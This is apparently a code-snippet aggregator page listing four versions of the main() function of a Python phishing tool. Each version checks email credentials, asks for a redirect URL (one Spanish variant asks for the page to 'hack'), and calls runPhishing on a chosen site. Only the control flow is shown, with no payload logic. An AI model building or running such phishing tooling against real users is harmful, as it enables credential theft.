Beispiel #1
0
def main():
    print(
        red("This version will not work anymore. Wait please until the next release. Sorry for inconvenience."
            ))
    exit(0)
    head()
    checkEd()
    try:
        checkmail()
    except (SMTPAuthenticationError, ValueError):
        print(red(' [!] Your authentication failed'))
    except IndexError:
        print(red(' [!] this domain is not supported'))

    site = main_menu()
    while True:
        custom = input(cyan('\n Insert a custom redirect url: > '))

        if not custom:
            pass
        else:
            break

    custom = 'http://' + custom if '://' not in custom else custom
    loadModule(site.lower())
    runPhishing(site.lower(), custom)
Beispiel #2
0
def main():
    head()
    checkEd()
    try:
        checkmail()
    except (SMTPAuthenticationError, ValueError):
        print(red(' [!] Your authentication failed'))
    except IndexError:
        print(red(' [!] this domain is not supported'))

    site = main_menu()
    while True:
        custom = input(cyan('\n Insert a custom redirect url: > '))

        if not custom:
            pass
        else:
            break

    custom = 'http://' + custom if '://' not in custom else custom
    loadModule(site.lower())
    runPhishing(site.lower(), custom)
Beispiel #3
0
def main():
    head()
    checkEd()    
    try:
        checkmail()
    except (SMTPAuthenticationError,ValueError):
        print(red(' [!] Tu autenticacion ha sido fallida'))
    except IndexError:
        print(red(' [!] Este dominio no esta soportado.'))

    site = main_menu()
    while True:
        custom = input(cyan('\n Inserta el link de la pagina que quieres hackear: > '))

        if not custom:
            pass
        else:
            break
    
    custom = 'http://' + custom if '://' not in custom else custom
    loadModule(site.lower())
    runPhishing(site.lower(), custom)
Beispiel #4
0
def main():
    start()
    updater()
    main_menu()